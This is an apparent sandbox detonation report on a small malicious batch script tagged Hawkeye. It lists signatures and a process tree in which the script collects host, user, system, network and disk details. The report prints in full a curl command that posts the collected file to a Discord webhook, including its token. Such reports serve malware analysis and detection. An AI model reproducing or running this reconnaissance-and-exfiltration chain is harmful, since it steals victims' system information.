Analysis
max time kernel: 103s
max time network: 140s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01/04/2025, 14:46
Static task: static1
General
Target: 5QWRY_niggagimeinfo2.bat
Size: 699B
MD5: 2f1b10244d657f82424382d603ef2091
SHA1: b7a08e5f497fbf65521ebc2a10e602c5c09ae045
SHA256: 5bd7534e452a826f244c3f0531296895aa3d12c334bc0f9be484634af3df4f4b
SHA512: 1a19a13f8a31d4e15feb9c436f16bf4ac3494779376995ea4377b7795a16db3832a1656473e43ed8b1c5a3f6814bc6f1d00aaf2978e7677ce7ed2f537adbb7a9
Malware Config
Signatures
- Hawkeye family
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
    flow  ioc
    30    discord.com
    31    discord.com
- Collects information from the system (1 TTPs, 1 IoCs)
  Uses WMIC.exe to find detailed system information.
    pid   Process
    3008  WMIC.exe
- Gathers network information (2 TTPs, 2 IoCs)
  Uses commandline utility to view network configuration.
    pid   Process
    4716  ipconfig.exe
    2108  ipconfig.exe
- Gathers system information (1 TTPs, 1 IoCs)
  Runs systeminfo.exe.
    pid   Process
    2716  systeminfo.exe
- Suspicious use of AdjustPrivilegeToken (43 IoCs)
    description                           pid   Process
    Token: SeDebugPrivilege               2344  whoami.exe
    Token: SeIncreaseQuotaPrivilege       3008  WMIC.exe
    Token: SeSecurityPrivilege            3008  WMIC.exe
    Token: SeTakeOwnershipPrivilege       3008  WMIC.exe
    Token: SeLoadDriverPrivilege          3008  WMIC.exe
    Token: SeSystemProfilePrivilege       3008  WMIC.exe
    Token: SeSystemtimePrivilege          3008  WMIC.exe
    Token: SeProfSingleProcessPrivilege   3008  WMIC.exe
    Token: SeIncBasePriorityPrivilege     3008  WMIC.exe
    Token: SeCreatePagefilePrivilege      3008  WMIC.exe
    Token: SeBackupPrivilege              3008  WMIC.exe
    Token: SeRestorePrivilege             3008  WMIC.exe
    Token: SeShutdownPrivilege            3008  WMIC.exe
    Token: SeDebugPrivilege               3008  WMIC.exe
    Token: SeSystemEnvironmentPrivilege   3008  WMIC.exe
    Token: SeRemoteShutdownPrivilege      3008  WMIC.exe
    Token: SeUndockPrivilege              3008  WMIC.exe
    Token: SeManageVolumePrivilege        3008  WMIC.exe
    Token: 33                             3008  WMIC.exe
    Token: 34                             3008  WMIC.exe
    Token: 35                             3008  WMIC.exe
    Token: 36                             3008  WMIC.exe
    Token: SeIncreaseQuotaPrivilege       3008  WMIC.exe
    Token: SeSecurityPrivilege            3008  WMIC.exe
    Token: SeTakeOwnershipPrivilege       3008  WMIC.exe
    Token: SeLoadDriverPrivilege          3008  WMIC.exe
    Token: SeSystemProfilePrivilege       3008  WMIC.exe
    Token: SeSystemtimePrivilege          3008  WMIC.exe
    Token: SeProfSingleProcessPrivilege   3008  WMIC.exe
    Token: SeIncBasePriorityPrivilege     3008  WMIC.exe
    Token: SeCreatePagefilePrivilege      3008  WMIC.exe
    Token: SeBackupPrivilege              3008  WMIC.exe
    Token: SeRestorePrivilege             3008  WMIC.exe
    Token: SeShutdownPrivilege            3008  WMIC.exe
    Token: SeDebugPrivilege               3008  WMIC.exe
    Token: SeSystemEnvironmentPrivilege   3008  WMIC.exe
    Token: SeRemoteShutdownPrivilege      3008  WMIC.exe
    Token: SeUndockPrivilege              3008  WMIC.exe
    Token: SeManageVolumePrivilege        3008  WMIC.exe
    Token: 33                             3008  WMIC.exe
    Token: 34                             3008  WMIC.exe
    Token: 35                             3008  WMIC.exe
    Token: 36                             3008  WMIC.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
    description                        pid   Process  procid_target
    PID 3316 wrote to memory of 5032   3316  cmd.exe  87
    PID 3316 wrote to memory of 5032   3316  cmd.exe  87
    PID 3316 wrote to memory of 2344   3316  cmd.exe  88
    PID 3316 wrote to memory of 2344   3316  cmd.exe  88
    PID 3316 wrote to memory of 2716   3316  cmd.exe  89
    PID 3316 wrote to memory of 2716   3316  cmd.exe  89
    PID 3316 wrote to memory of 3584   3316  cmd.exe  90
    PID 3316 wrote to memory of 3584   3316  cmd.exe  90
    PID 3316 wrote to memory of 4716   3316  cmd.exe  97
    PID 3316 wrote to memory of 4716   3316  cmd.exe  97
    PID 3316 wrote to memory of 1628   3316  cmd.exe  98
    PID 3316 wrote to memory of 1628   3316  cmd.exe  98
    PID 3316 wrote to memory of 2108   3316  cmd.exe  99
    PID 3316 wrote to memory of 2108   3316  cmd.exe  99
    PID 3316 wrote to memory of 3588   3316  cmd.exe  100
    PID 3316 wrote to memory of 3588   3316  cmd.exe  100
    PID 3316 wrote to memory of 3008   3316  cmd.exe  101
    PID 3316 wrote to memory of 3008   3316  cmd.exe  101
    PID 3316 wrote to memory of 4424   3316  cmd.exe  102
    PID 3316 wrote to memory of 4424   3316  cmd.exe  102
Processes
- C:\Windows\system32\cmd.exe (depth 1, PID 3316)
  command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5QWRY_niggagimeinfo2.bat"
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\HOSTNAME.EXE (depth 2, PID 5032)
    command line: hostname
  - C:\Windows\system32\whoami.exe (depth 2, PID 2344)
    command line: whoami
    signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\systeminfo.exe (depth 2, PID 2716)
    command line: systeminfo
    signatures: Gathers system information
  - C:\Windows\system32\findstr.exe (depth 2, PID 3584)
    command line: findstr /B /C:"OS Name" /C:"OS Version"
  - C:\Windows\system32\ipconfig.exe (depth 2, PID 4716)
    command line: ipconfig
    signatures: Gathers network information
  - C:\Windows\system32\findstr.exe (depth 2, PID 1628)
    command line: findstr IPv6
  - C:\Windows\system32\ipconfig.exe (depth 2, PID 2108)
    command line: ipconfig
    signatures: Gathers network information
  - C:\Windows\system32\findstr.exe (depth 2, PID 3588)
    command line: findstr IPv4
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2, PID 3008)
    command line: wmic logicaldisk get caption, freespace, size
    signatures: Collects information from the system; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\curl.exe (depth 2, PID 4424)
    command line: curl -X POST https://discord.com/api/webhooks/1356639514516521070/8nlc2VGdJHuRDez5RrzlRRII70A1yJIPtcnWxxs29eiCCPnO9RISRmMRDDKhvSaTzDx8 -H -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"